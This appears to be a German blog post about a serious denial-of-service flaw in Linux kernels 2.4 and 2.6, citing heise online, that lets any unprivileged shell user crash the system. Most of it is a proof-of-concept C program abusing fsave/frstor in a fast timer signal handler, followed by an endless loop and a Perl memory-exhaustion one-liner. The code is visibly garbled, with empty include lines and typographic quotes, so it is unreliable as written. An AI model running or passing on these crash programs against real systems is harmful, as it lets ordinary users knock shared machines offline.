Gravierende Sicherheitslücke im Linux-Kernel 2.4 und 2.6

Ein Bug im Linux-Kernel führt dazu, dass Anwender mit einem einfachen C-Programm das System lahm legen können. Dazu sind nicht einmal Root-Rechte nötig. Offenbar sind alle Linux-Kernel 2.4.x und 2.6.x betroffen, während das Problem bei 2.2er-Kerneln nicht auftritt. Die Sicherheitslücke ist besonders gravierend, da sie jeder Benutzer mit einem Shell-Account ausnutzen kann.

Quelle: Externer Linkheise online

Hier mal ein wenig Code:

#include
#include
#include

static void Handler(int ignore)
{
char fpubuf[108];
__asm__ __volatile__ („fsave %0\n“ : : „m“(fpubuf));
write(2, „*“, 1);
__asm__ __volatile__ („frstor %0\n“ : : „m“(fpubuf));
}

int main(int argc, char *argv[])
{
struct itimerval spec;
signal(SIGALRM, Handler);
spec.it_interval.tv_sec=0;
spec.it_interval.tv_usec=100;
spec.it_value.tv_sec=0;
spec.it_value.tv_usec=100;
setitimer(ITIMER_REAL, &spec, NULL);
while(1)
write(1, „.“, 1);

return 0;
}

oder

while(1){i++;}

oder das ganze in Perl

perl -e ‚$s=“ „; while() { $s.=$s;}

Schreiben Sie einen Kommentar

Ihre E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert

* Die DSGVO-Checkbox ist ein Pflichtfeld

*

Zustimmung zur Datenspeicherung lt. DSGVO